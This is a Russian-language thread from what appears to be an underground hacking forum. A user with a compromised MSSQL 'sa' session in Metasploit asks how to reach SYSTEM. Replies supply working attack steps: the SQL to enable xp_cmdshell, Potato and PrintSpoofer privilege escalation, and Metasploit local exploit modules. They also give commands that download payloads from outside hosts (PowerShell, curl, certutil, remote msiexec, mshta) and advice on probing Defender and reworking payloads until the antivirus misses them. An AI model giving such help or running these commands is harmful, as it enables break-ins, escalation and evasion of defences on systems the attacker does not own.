• XSS.stack #1 – первый литературный журнал от юзеров форума

повышение прав MSSQL

SlEpOy_SnIpEr

Премиум
Premium
Регистрация
17.02.2021
Сообщения
293
Реакции
70
Гарант сделки
4
Имею mssql сессию в метасплоите. через модуль mssql_exec показывает права "nt authority\network service". Как можно повысить права до администратора или системы? учетка в mssql "sa"
 
1.У тебя учетка сисадмина SQL сервера(sa), попробуй включить xpcmdshell, это позволит выполнять команды(если не выйдет через xpcmdshell, то можно попробовать прогрузить .dll Гугли MSSQL User Defined Function и через него так же получить RCE)
2. У сервисных акков есть SeImpersonatePrivilege(можешь проверить через whoami /priv), а значит можно привэскнуться до системы через картошку или спуллер, в зависимости от версии сервера(RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato, JuicyPotato)

P.S только сейчас вкурил что ты юзаешь mssql_exec модуль msf, который так-то и использует xpcmdshell. Тогда первый пункт пропускаешь
 
Последнее редактирование:
2. У сервисных акков есть SeImpersonatePrivilege(можешь проверить через whoami /priv), а значит можно привэскнуться до системы через картошку или спуллер, в зависимости от версии сервера(RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato, JuicyPotato)
как мне подгрузить exe в систему, если в msf в меня sql сессия только?
 
как мне подгрузить exe в систему, если в msf в меня sql сессия только?
У тебя ж уже выполнение команд через mssql_exec, заспавни себе новый шелл через него(скачай его любым удобным способом, через пш например), а потом выполни. Заспавнится обычная мсф сессия от имени mssql сервис акка, а дальше уже привэскайся
 
Последнее редактирование:
У тебя ж уже выполнение команд через mssql_exec, заспавни себе новый шелл через него(скачай его любым удобным способом, через пш например), а потом выполни. Заспавнится обычная мсф сессия от имени mssql сервис акка, а дальше уже привэскайся
есть статья?
 
есть статья?
Твоего конкретного кейса не нашел(на самом деле тебе просто надо открыть более удобный шелл, а потом уже привэскаться, но никто не запрещает выполнять все и через mssql_exec, хотя для картошки все равно надо будет залить твой имплант, он запустится и отстрельнет под системой)
Описание картошек:
 
Чтобы повысить права с nt authority\network service до Administrator или SYSTEM, можно попробовать следующие варианты:

1-Активация xp_cmdshell : Используй учетную запись sa для выполнения команд системы:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

2-Эксплуатация локальных уязвимостей:
Попробуй модули Metasploit:exploit/windows/local/ms16_032_secondary_logon_handle_privesc для повышения прав до SYSTEM.
exploit/windows/local/ms10_015_kitrap0d для эксплуатации уязвимости в win32k.sys на старых версиях Windows.
 
Чтобы повысить права с nt authority\network service до Administrator или SYSTEM, можно попробовать следующие варианты:

1-Активация xp_cmdshell : Используй учетную запись sa для выполнения команд системы:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

2-Эксплуатация локальных уязвимостей:
Попробуй модули Metasploit:exploit/windows/local/ms16_032_secondary_logon_handle_privesc для повышения прав до SYSTEM.
exploit/windows/local/ms10_015_kitrap0d для эксплуатации уязвимости в win32k.sys на старых версиях Windows.
у меня есть сессия sql в метасплоите.
 
xp_cmdshell, через него подгружаешь файл и запускаешь
я могу использовать модуль mssql_exec. но как чего него подгрузить файл и получить другую оболочку?
 
я могу использовать модуль mssql_exec. но как чего него подгрузить файл и получить другую оболочку?
Возможно, я пока с mssql не работал(не доводилось)
 
я могу использовать модуль mssql_exec. но как чего него подгрузить файл и получить другую оболочку?
Придумал - выполни команду mssql_exec, чтобы выполнить запрос к MSSQL, а в команде mssql_exec выполни следущее - xp_cmdshell и команду, т.е. команда должна выглядеть как то так: mssql_exec xp_cmdshell <команда>(ну я не знаю точный синтаксис)
 
Добавлю, тема интересная, может тут что подойдет ;)



 
Придумал - выполни команду mssql_exec, чтобы выполнить запрос к MSSQL, а в команде mssql_exec выполни следущее - xp_cmdshell и команду, т.е. команда должна выглядеть как то так: mssql_exec xp_cmdshell <команда>(ну я не знаю точный синтаксис)
в модуле mssql_exec и так используя xp_cmdshell он выполняет команды в системе. но нет прав для определенных действий.
 
в модуле mssql_exec и так используя xp_cmdshell он выполняет команды в системе. но нет прав для определенных действий.
Так повысь их и всё, была проблема в исполнении комманд, вот исправилось всё, теперь просто байпась UAC, ну или повышай привилегии
 
Так повысь их и всё, была проблема в исполнении комманд, вот исправилось всё, теперь просто байпась UAC, ну или повышай привилегии
у меня с начала создания данной темы не было проблем с выполнением команд в системе. мне нужно повысить как-то права. но mssql_exec не позволяет закидывать пэйлоад, либо файл на таргет
 
у меня с начала создания данной темы не было проблем с выполнением команд в системе. мне нужно повысить как-то права. но mssql_exec не позволяет закидывать пэйлоад, либо файл на таргет
Так через xp_cmdshell закинь
 
у меня с начала создания данной темы не было проблем с выполнением команд в системе. мне нужно повысить как-то права. но mssql_exec не позволяет закидывать пэйлоад, либо файл на таргет
Проблема на таргет файл кинуть?

1) powershell -C [IO.File]::WriteAllBytes('%temp%\lol.jpg',((Invoke-WebRequest -UseBasicParsing -Uri 'https://file.io/Ux7ogIg3shWc').Content))
2) Если есть в винде курл: curl -k -o %temp%\lol.jpg https://file.io/StmbJW7z6V8k
3) certutil.exe -urlcache -f https://somewhere/yourfile %temp%\lol3.jpg <-- с file.io правда не сработает заливай на другой обменник


%temp% у меня под "nt authority\network service" вот такой путь имеет: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp


Перед этим всем желательно узнать какой ав там стоит и вообще софт: wmic product get Name
sc query <--- выдаст список служб смотришь чё там работает
powershell -C Get-MpPreference <-- конфигурация виндефа
powershell -C Get-MpThreat <-- список детектов найденных дефом

Если софт собран в .msi то можно ставить прямо удалённо:

msiexec /i http://mysite/hui.msi
 
авер палит пэйлоад. пробовал через hta exploit и дальше "cmd.exe /c mshta http://ip:8080/exploit.hta". и не срабатывает
чекай какой авер и чисти под него что там у тебя
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх